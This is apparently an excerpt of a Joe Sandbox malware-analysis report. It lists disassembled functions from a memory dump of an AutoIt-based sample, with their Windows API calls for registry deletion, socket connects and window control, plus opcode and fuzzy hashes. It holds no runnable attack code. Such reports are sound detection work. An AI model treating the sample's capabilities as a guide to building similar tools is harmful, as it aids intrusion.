Part of subcall function 007C122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 007C1318

RegDeleteKeyW.ADVAPI32(?,?), ref: 007C12E0

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: EnumFreeLibrary$CloseDeleteOpen
String ID:
API String ID: 395352322-0
Opcode ID: ee7f67177ea491ea9ec7c994ff78816159ab315a8a3df5e76be0670408f9a739
Instruction ID: cbfe36349fa1abc49b1514ecd3a1be04a02fa9d70ad95d56ed86a7eed25e2ce2
Opcode Fuzzy Hash: ee7f67177ea491ea9ec7c994ff78816159ab315a8a3df5e76be0670408f9a739
Instruction Fuzzy Hash: 30311AB5901119BFDB149B90DC89EFEB7BCEF09304F40417DE501E2152EB789E859BA4

Function 007C653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 007C655B
GetWindowLongW.USER32(01685788,000000F0), ref: 007C658E
GetWindowLongW.USER32(01685788,000000F0), ref: 007C65C3
SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007C65F5
SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 007C661F
GetWindowLongW.USER32(00000000,000000F0), ref: 007C6630
SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 007C664A

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LongWindow$MessageSend
String ID:
API String ID: 2178440468-0
Opcode ID: 756848dbdf07da931597e462ad3dd0c7313d945fa0ea05ae811b912d6b88998b
Instruction ID: 5f442b175042aaae9da2674affee27b2cdecb7cf7142b2fab27fb1d5e46cf8a0
Opcode Fuzzy Hash: 756848dbdf07da931597e462ad3dd0c7313d945fa0ea05ae811b912d6b88998b
Instruction Fuzzy Hash: 0031F230604251AFDB208F18ECC5F653BE2FB4A714F2941ACF6119B2B6CB79E860DB51

Function 007B6486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON

Download Yara Rule

APIs

Part of subcall function 007B80A0: inet_addr.WSOCK32(00000000), ref: 007B80CB

socket.WSOCK32(00000002,00000001,00000006), ref: 007B64D9
WSAGetLastError.WSOCK32(00000000), ref: 007B64E8
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007B6521
connect.WSOCK32(00000000,?,00000010), ref: 007B652A
WSAGetLastError.WSOCK32 ref: 007B6534
closesocket.WSOCK32(00000000), ref: 007B655D
ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 007B6576

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
String ID:
API String ID: 910771015-0
Opcode ID: 5091122fec54d794ee2ace699e3c1900fdf36d03f81eebcccaa87865a5f9a8e3
Instruction ID: dd251e40aa15cbc26dc46ba00d6d4e0e1d5e6d2434fc490df8e9ca35459ff855
Opcode Fuzzy Hash: 5091122fec54d794ee2ace699e3c1900fdf36d03f81eebcccaa87865a5f9a8e3
Instruction Fuzzy Hash: 25317071600118ABDB10AF24DC89FFA7BADEF45714F048069FA05A7291DB7CAD14CBA1

Function 0079E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0079E0FA
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0079E120
SysAllocString.OLEAUT32(00000000), ref: 0079E123
SysAllocString.OLEAUT32 ref: 0079E144
SysFreeString.OLEAUT32 ref: 0079E14D
StringFromGUID2.OLE32(?,?,00000028), ref: 0079E167
SysAllocString.OLEAUT32(?), ref: 0079E175

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: String$Alloc$ByteCharMultiWide$FreeFrom
String ID:
API String ID: 3761583154-0
Opcode ID: 5ba794a12c74e57d53f980658af7b2578b1cf0d6bc2c9cc193dcc9666469291f
Instruction ID: cf20648179013a51dbc2df4094612ea6caca6d642fc52b7e1f8a5bb8a6eeb4c0
Opcode Fuzzy Hash: 5ba794a12c74e57d53f980658af7b2578b1cf0d6bc2c9cc193dcc9666469291f
Instruction Fuzzy Hash: 5E213E35604208AFDF10DFA8EC88DAB77EDEB09760B548139F915CB260DA79DD418B64

Function 0079FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0079FB81
__wcsnicmp.LIBCMT ref: 0079FBA2
__wcsnicmp.LIBCMT ref: 0079FBBC

Strings

#OnAutoItStartRegister, xrefs: 0079FBB6
#notrayicon, xrefs: 0079FB79
#requireadmin, xrefs: 0079FB9C

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 1038674560-2734436370
Opcode ID: d1056bf3101cbb1b89c9b204018e45fec15cd31092a267d9c464479baa6192f8
Instruction ID: 3abf143fa19bad792b2ed5cbfbf2a70c5ab8edda8603bf30611c8150145cb23c
Opcode Fuzzy Hash: d1056bf3101cbb1b89c9b204018e45fec15cd31092a267d9c464479baa6192f8
Instruction Fuzzy Hash: 022167B2204650E6DB30EA30FC16EA77398DF52308F148036FC86C7182EB5DA982D2A1

Function 007C783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00741D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00741D73
Part of subcall function 00741D35: GetStockObject.GDI32(00000011), ref: 00741D87
Part of subcall function 00741D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00741D91

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 007C78A1
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 007C78AE
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 007C78B9
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 007C78C8
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 007C78D4

Strings

Msctls_Progress32, xrefs: 007C7872

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 9d0b9e1f6cc50b083413a8439e64752df6a80b24e9d7558b745d48a7dae360c9
Instruction ID: 61497c25623c2be0e9ef22eafe773013d3bc5b631bad23e2f7340be676ea95aa
Opcode Fuzzy Hash: 9d0b9e1f6cc50b083413a8439e64752df6a80b24e9d7558b745d48a7dae360c9
Instruction Fuzzy Hash: 20118EB2510219BFEF159E60CC85EE77F6DEF08768F014119FB04A2090CB769C21DBA4

Function 007641C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00764292,?), ref: 007641E3
GetProcAddress.KERNEL32(00000000), ref: 007641EA
EncodePointer.KERNEL32(00000000), ref: 007641F6
DecodePointer.KERNEL32(00000001,00764292,?), ref: 00764213

Strings

RoInitialize, xrefs: 007641D2
combase.dll, xrefs: 007641DE

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoInitialize$combase.dll
API String ID: 3489934621-340411864
Opcode ID: d7710ead828d1b6c9b9df05c0eafef3a09f7c6a4b91d57cfb5d411ffb8738413
Instruction ID: a2bdada31b4880c5ad06118be6aeb9f90ec5a55ea3ae4029fdddeeb1ea32fc6e
Opcode Fuzzy Hash: d7710ead828d1b6c9b9df05c0eafef3a09f7c6a4b91d57cfb5d411ffb8738413
Instruction Fuzzy Hash: 5DE01AF06D0340AFEB606BB0EC0DF043AA6B761B02F109428FA12D51A0DBBE4096CF04

Function 0076429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,007641B8), ref: 007642B8
GetProcAddress.KERNEL32(00000000), ref: 007642BF
EncodePointer.KERNEL32(00000000), ref: 007642CA
DecodePointer.KERNEL32(007641B8), ref: 007642E5

Strings

combase.dll, xrefs: 007642B3
RoUninitialize, xrefs: 007642A7

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: 79c3aed1890fb2d6fc0d2eaa85fb609d178d94432ba7333986cb699fb2f88a11
Instruction ID: f1263e1cdd8bc453698ee793f206382f5940e163b71952c4d29e75daf11a4af6
Opcode Fuzzy Hash: 79c3aed1890fb2d6fc0d2eaa85fb609d178d94432ba7333986cb699fb2f88a11
Instruction Fuzzy Hash: D8E0B6B86C1300AFEB509B61EC0DF053BA6B725742F20902AF601E11A0CBBC4545CA18

Function 007A675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 007A68AD
_memmove.LIBCMT ref: 007A67E8

Part of subcall function 00749997: __itow.LIBCMT ref: 007499C2
Part of subcall function 00749997: __swprintf.LIBCMT ref: 00749A0C

_memmove.LIBCMT ref: 007A685B
_memmove.LIBCMT ref: 007A6942
_memmove.LIBCMT ref: 007A695B
_memmove.LIBCMT ref: 007A6977

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
Instruction ID: 4372021567804b7caedbba176daefdfd24f37961e123e7dcb2f434cb5d978950
Opcode Fuzzy Hash: dd9f741a82659a823d4949ee15d748aae4244aa3bc9c2687c19c610e119a32c9
Instruction Fuzzy Hash: 62619E7050465ADBCF15EF20CC89EFF37A8AF86308F484619F9565B292DB3CA941CB91

Function 007C046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00747F41: _memmove.LIBCMT ref: 00747F82

Part of subcall function 007C10A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C0038,?,?), ref: 007C10BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007C0548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 007C0588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 007C05AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 007C05D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 007C0617
RegCloseKey.ADVAPI32(00000000), ref: 007C0624

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: e3038592c8d320cfd3e6f0b7c819b8b7cc1e1b9c4550054d73f0802419e6d139
Instruction ID: 7b9da34c6bba837485368fa470703942797f2d5de764c2e0e7b3a3058d9b317e
Opcode Fuzzy Hash: e3038592c8d320cfd3e6f0b7c819b8b7cc1e1b9c4550054d73f0802419e6d139
Instruction Fuzzy Hash: 3D515B31208200DFCB14EF24D889E6BBBE9FF85714F04891DF545972A2DB39E914CB92

Function 007C5A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007C5A82
GetMenuItemCount.USER32(00000000), ref: 007C5AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007C5AE1
GetMenuItemID.USER32(?,?), ref: 007C5B50
GetSubMenu.USER32(?,?), ref: 007C5B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 007C5BAF

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: cab4049d25ccfbb5e7b3cf4e7be219b3c1d5d5866f899beafed09a28c788457c
Instruction ID: a05f3b84c21065d6d53a2293c26c851cfb8f2ceaaae01d8b10cc9883faac15cc
Opcode Fuzzy Hash: cab4049d25ccfbb5e7b3cf4e7be219b3c1d5d5866f899beafed09a28c788457c
Instruction Fuzzy Hash: 4F517C71A00615EFCF119F64C849EAEBBB5EF48310F14846DE902B7351CB79BE818B90

Function 0079F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0079F3F7
VariantClear.OLEAUT32(00000013), ref: 0079F469
VariantClear.OLEAUT32(00000000), ref: 0079F4C4
_memmove.LIBCMT ref: 0079F4EE
VariantClear.OLEAUT32(?), ref: 0079F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0079F569

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: fc8f66f1386676552e985a4082975e95808b32ac4310dba31537806b1e4b5f9d
Instruction ID: e2d15f042882cbc0fe7161fd1d638da9425ec03ca4cce67600c3ed781136aa26
Opcode Fuzzy Hash: fc8f66f1386676552e985a4082975e95808b32ac4310dba31537806b1e4b5f9d
Instruction Fuzzy Hash: 55515BB5A00249DFCB14DF58D884EAAB7B9FF48314B158169ED59DB310D734E911CBA0

Function 007A26F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 007A2747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A2792
IsMenu.USER32(00000000), ref: 007A27B2
CreatePopupMenu.USER32 ref: 007A27E6
GetMenuItemCount.USER32(000000FF), ref: 007A2844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 007A2875

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 5c24e153475812e1f53c2d6f276c8cd4948a55222f544fff38585d85d50cc03a
Instruction ID: 0b5b9fc11ab283e443d981332fe552fca385094ab1a32987e463f071f9cad9b8
Opcode Fuzzy Hash: 5c24e153475812e1f53c2d6f276c8cd4948a55222f544fff38585d85d50cc03a
Instruction Fuzzy Hash: 6A51AF70A00205EFDF24CF6CD988AAEBBF5AF86314F104369F8119B292D77C9906CB51

Function 00741765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

BeginPaint.USER32(?,?,?,?,?,?), ref: 0074179A
GetWindowRect.USER32(?,?), ref: 007417FE
ScreenToClient.USER32(?,?), ref: 0074181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0074182C
EndPaint.USER32(?,?), ref: 00741876

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 11b883745224dca8f0573ef2a92cc220d6f22ec6cb88ca08460b13ff57a71b9e
Instruction ID: 7998233bbb3046e8145ec00bae823af131333d7f4eb8426c47a036d688eca060
Opcode Fuzzy Hash: 11b883745224dca8f0573ef2a92cc220d6f22ec6cb88ca08460b13ff57a71b9e
Instruction Fuzzy Hash: 9E419D70200201AFD711EF24CC88FB67BE9FB49734F048669F9A4861A1D7399895DB61

Function 007CB958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(008067B0,00000000,01685788,?,?,008067B0,?,007CB862,?,?), ref: 007CB9CC
EnableWindow.USER32(00000000,00000000), ref: 007CB9F0
ShowWindow.USER32(008067B0,00000000,01685788,?,?,008067B0,?,007CB862,?,?), ref: 007CBA50
ShowWindow.USER32(00000000,00000004,?,007CB862,?,?), ref: 007CBA62
EnableWindow.USER32(00000000,00000001), ref: 007CBA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 007CBAA9

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 97668e55cde857a477091ecd7bd80bf0b75529678a3909af162a620a2064a2af
